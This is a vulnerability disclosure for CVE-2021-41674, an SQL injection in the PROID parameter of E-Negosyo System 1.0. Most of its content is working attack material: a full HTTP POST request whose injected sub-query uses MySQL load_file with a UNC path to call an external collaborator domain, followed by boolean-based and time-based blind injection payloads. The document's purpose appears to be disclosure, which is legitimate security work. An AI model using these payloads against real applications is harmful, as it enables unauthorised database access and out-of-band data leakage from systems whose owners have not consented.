CVE-2021-41674
Description:
The PROID parameter from E-Negosyo System 1.0 app appears to be vulnerable to SQL injection attacks in two types of injections - time-based blind and boolean-based blind.
The payload '+(select load_file('\\4x2hh1o010l184bd0ql510xgq7w0kw8nbb3yvmk.nu11secur1tycollaborator.net\juc'))+' was submitted in the PROID parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed.
MySQL request:
POST /bsenordering/cart/controller.php?action=add HTTP/1.1
Host: 192.168.1.2
Origin: http://192.168.1.2
Cookie: PHPSESSID=n2krmhjsahctm8bpj44kms36b4
Upgrade-Insecure-Requests: 1
Referer: http://192.168.1.2/bsenordering/index.php?q=product
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 57
PROPRICE=50&PROQTY=10&PROID=201735'%2b(select%20load_file('%5c%5c%5c%5c4x2hh1o010l184bd0ql510xgq7w0kw8nbb3yvmk.nu11secur1tycollaborator.net%5c%5cjuc'))%2b'&btnorder=%C2%9E%C3%A9eMySQL response:
HTTP/1.1 200 OK
Date: Sat, 30 Oct 2021 06:28:29 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8Payloads
---
Parameter: PROID (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: PROPRICE=50&PROQTY=10&PROID=201735'+(select load_file('\\\\4x2hh1o010l184bd0ql510xgq7w0kw8nbb3yvmk.nu11secur1tycollaborator.net\\juc'))+'' OR NOT 5430=5430#&btnorder=%C2%9E%C3%A9e
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: PROPRICE=50&PROQTY=10&PROID=201735'+(select load_file('\\\\4x2hh1o010l184bd0ql510xgq7w0kw8nbb3yvmk.nu11secur1tycollaborator.net\\juc'))+'' AND (SELECT 8860 FROM (SELECT(SLEEP(5)))cikV)-- oroY&btnorder=%C2%9E%C3%A9e
---
Reproduce:
NOTE:
- The PoC A.K.A
CVE-SQL.pyis encrypted for security reasons!
